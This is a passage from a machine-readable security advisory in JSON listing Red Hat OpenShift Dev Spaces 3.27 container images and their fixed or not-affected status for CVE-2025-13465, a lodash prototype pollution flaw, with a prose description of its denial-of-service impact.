},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64 as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le as a component of Red Hat OpenShift Dev Spaces 3.27",
"product_id": "Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
},
"product_reference": "registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Dev Spaces 3.27"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:de4737b85e6f485e6dc5283574f7da587995ef60a17039df4728c126df00b4e4_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:4550375a1ce30dfa306ac819590e0f95f512a7f9036e756e0ed643297f7555fe_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:62a2ad04b76186b8cc425a677aee50ed2e0cf531fc87888f513fe54d250510d3_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:782ccfcc7d458e2b27f0146c39bcf43c3133197d62a97052a2b67da4000c0c47_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/server-rhel9@sha256:c51792428816b2744121027ff39c1f0d1368ad2812e5604f4aceefe85ee23f00_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:113200dd0b705840cbfd2128236c4ab3813e0146a45538f8d348517045004b10_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:84050974bd849ca3380327c00ae001980b9fee834bf44e080c90442be4b17682_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:db2b024c908f9e92b63b05e5de9c4a97d8258604e538e9b30261768f415a8213_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel10@sha256:e5209000fd966c4e98fa6609f998fe0d6edc3088aeaa68f1261865c168379df7_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:3e42db39ee6eff785c8e03e6a4f764ea5359221c2c9ecd153caee01a780d029b_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5ecda2244caefbd85bd89bf7f8caeeeb511e91f87a6d46d83d7553901459715a_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:df538d83965fbf69f86fda16c699ee043ecbdb6b2a6b93ac9ef63e73d564537e_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-base-rhel9@sha256:e095dd0cb8e327d8d6589bba674372aeb38397b22790bfed208156d3bb9d746c_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:58111d940c17ffcef32fc2d86f19c8d0f629b89c6412fb9933ca1ad411eec48f_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:8a97ad4c50e74468ffddb50f6dc3a748bd6223ca6dd869159eaa19447e8d5735_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:cef073ba3e67731d90b615b1ed97e8d8941f4b84f795feebaa14cbba4506c22a_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/udi-rhel9@sha256:f6eb04566e390bab2a8028146d0c54ffb3357cde8a633edd4e19ab29629acec4_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1033ffe714e728e289eddaa3809e9d21915de193813339fa5c049373e3e78719_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:1c026c9c6fa5b70e2ab18b79f7974fe811558a4fbb3efee8eac17a165af2d4a2_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:650e9cec2b386064718aa87d794e3264eaf3af766060e4141f6f0870347cdb64_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-rhel9@sha256:cad5f1983385201427a94f980baeefece28aedc8089425db88806d54103dfe91_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:272a65ee82a9484e1d4362a9f33b6cc1b0eb13d93e70b19cc3d0208f021c2bda_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:2bc4515148a52d94e1fcaf8991ddf0e9e98f0565bdae0f7f6c732feac0540d95_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:e139d927ef936bfabf780286ec4b4bf97e318db69c1af5b7473dd33ae54931b4_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/dashboard-rhel9@sha256:ff64d5d47c91c59904cb2a90eb9e42e563fea560407fa6c0590b964ace2ce469_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:49ec7497195cc73b5ab71a31d84f4adba1068580f1b615a4918a6b9a614b8e1b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:4a19870c5fa8b55441ce9de937de2023de89ec98415b70c8cdb868e541f7fe90_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:aae678397f22a53d10863aad458ea58d487b4ff87cd1a5200a02835fc2d76eb4_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/openvsx-rhel9@sha256:b47ea1f8c8cc35c7171251b9c044c38c7f66200e4336067c528b308f3a1779ec_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:12ae1997a6df944284ecfb3501138c25f1a39eba23b52685b48008174a6a363a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:3942aaa0d29412ca79a413216b27ac338af01b1db1e31c5bb023fd135094768b_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:b5f40cea19df512eb3083c9ec8a34b964742c44c4843ec979d0a4ff9e94ca02d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9a1f79f64b9427d4fa657f197d8e114f66ec6dfc028b8d4e47478d8f0d56d98_ppc64le"
],
"known_not_affected": [
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:6446db0167fbd287557bb29b9f090da15b1b0846c62df9fd96cafd0784d4769d_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ca2b5dd80258f6d5105df99a2a4160086248ede21fd4fdb7be7d9d0e1768ec99_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:d0e058ad62081efbb2d62a979d3d52443a19d361e2bec3d1bb1a6d403c4fa336_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:ed1952126d5efdfe97f1d5411b7f057631bbae1b9c748c5f45746b6ee145fcad_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:81dc1398a2f94a040d43841f908c743f696ba9edfdd36ad47b225a90ef69da28_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:87415e884ce4a792725ebef47c95e81a4c98b594a333f5c9852ce68c13d33c09_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:acaa080820cc3886395466b4a327600752f13eb9e8728cece8bff696d92649e2_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/configbump-rhel9@sha256:d160df16f213208e22f67e0261fed70a5aa6eb64a79438c7affac0748d214e08_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:d25e5effc8f3e6f0a02f3f1795cb83b585508b79e236b66e9a67be1511593864_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:5d1045ab74b00b9ac4888a7971adfddf03142cf73b80e427d2bdde17f8a33f7d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:6ca64429fd2b33806f766cb84e2392bf16e85a64adeb19f687fd2f5ba588a359_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b317d159f7de28b2424c0333f48574b4b6b4852405f82a0643c0f22ff37253c6_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:b98b93207d245e32fca4182f7f8debd05b853082f79eb06d513fd25eb659ab7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:0d44f88b37488308e5c166fbf61ef195e473949d4d8930742742d52da8bd1d09_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:49848a9d6c888956fe17c0a7faa350b1b534aa7623c6368c45fa676ec603c9a9_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:582e28a0f571b32aa45ffdde4369479efb0fa504f163caf738b2dea23ad017f0_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8487157abf1a0cb7fb35aafdf9f5c3f3b7b3c107c5583b5cb2ceb80aabaaba75_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:0504f72e32867f2e16ae91237e494ad597897d234da6c772deedeec03c77f7da_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:2c0bfdd79524706c055e32bc68b3e099beea3f19e89184e763912b964588ca7e_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:4eb8ed347e951e036b5e464891ad26775288421b5ad4279e0a0a6a7682ed614a_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:ed6c681b49c827af9faad6364a9a5fff068253878597f4e2768f51e2debedabf_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:70d9bf5801e6c359fa2853ecb7b2c1156bc8d05c64ff9089b4266ca7d1c96bdc_ppc64le",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:b260051bc38be6e1edfbb536b3d5568408406bd5ba214d9c460ff31fda95080d_s390x",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:c82b5be3ccc18dfc9f64732e2a6892e40555556119e041445867ee6895698fff_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/multicluster-redirector-rhel9@sha256:ef4cdde7f946cb4ac076651227c139ec1151fe1dfcfab16a7370eb5a1dedf8f8_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:31bed0f8d7cc026fb582a447d3cea648b6723b5309b282899062fb51a9b6b06b_arm64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:b6c81d692c2610b97c365ba0160bd4d4f3222b3b8129f46e9bb4f744d91ca142_amd64",
"Red Hat OpenShift Dev Spaces 3.27:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:ddbef65f258899cb9450a370e72a61acb6e3710f4fe76cd1d43d5b68d661f4cb_ppc64le",
